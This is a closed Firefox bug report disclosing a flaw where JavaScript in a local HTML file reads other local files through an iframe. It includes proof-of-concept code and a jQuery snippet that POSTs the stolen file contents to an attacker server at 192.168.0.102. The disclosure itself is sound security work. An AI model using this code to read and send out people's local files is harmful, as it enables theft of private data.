Closed Bug 1389481 Opened 8 years ago Closed 8 years ago

Access to local file system using javascript

Categories

(DevTools :: DOM, defect)

Product:
DevTools
Component:
DOM
Version:
57 Branch
Type:
defect
Priority:
Not set
Severity:
major

Tracking

(Not tracked)

Status:
RESOLVED DUPLICATE of bug 1389477

People

(Reporter: jenishsojitra99, Unassigned)

Details

Attachments

(1 file)

VIDEO POC
1.46 MB, video/ogg
Details
Attached video VIDEO POC
I have reported a issue in TOR browser via hackerone and they replied : Thanks for making us aware of this problem. Have you contacted the Mozilla people? It seems the underlying problem is a Firefox bug and if it indeed is problematic I think all the Firefox users should benefit and not just Tor Browser users. and suggested to report here Issue : Access to local file system using javascript(slightly xss on server side ) The browser can access the local files using iframes with a local html file. this is very normal and often used for local web development but javascript shouldn't be able to get the content of that iframe because this can be used to post the contents to the attackers server. something else I noticed is that it's not limited to the same directory. Steps to Reproduce : save a html file from here and open in tor browser . <html> <body> <div id='div1'> </div> <script> current_href = document.location.href frame = document.createElement('iframe'); frame.src = current_href.replace('file:///home/jnsjns/Desktop/poc5.html', 'file:///home/jnsjns/Desktop/1.txt'); frame.id = 'frm'; document.getElementById('div1').appendChild(frame) setTimeout(function func(){loot = document.getElementById('frm').contentWindow.document.getElementsByTagName('pre')[0].innerHTML alert('Your data is: ' + loot) }, 500) </script> </body> </html> Explaination : file:///home/jnsjns/Desktop/poc5.html this is my test html here. file:///home/jnsjns/Desktop/1.txt is server side local file in tor browser the private file is coming by popup (I have tested in chrome -Google ,they are safe from this ) What attacker can do ? I would have been able to post it to my server using jquery like this. //Gets data from iframe and saves it to the getdata variable getdata = document.getElementsByTagName('frm')[0].contentWindow.document.getElementsByTagName('pre')[0].innerHTML //Posts to the php server located at 192.168.0.102 (local address for demo purposes) $.ajax({type: "POST", url: "http://192.168.0.102/post.php", data: {string:getdata}});} This issue may critical . THE POPUP SHOULD NOT COME OUT : WE CAN SEE THAT CHROME DOESN'T ALLOW TO USER TO EXTRACT JS AND TAKE POPUP .THEY HAVE FIXED THIS . REGARDS.
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Product: Firefox → DevTools
Group: firefox-core-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: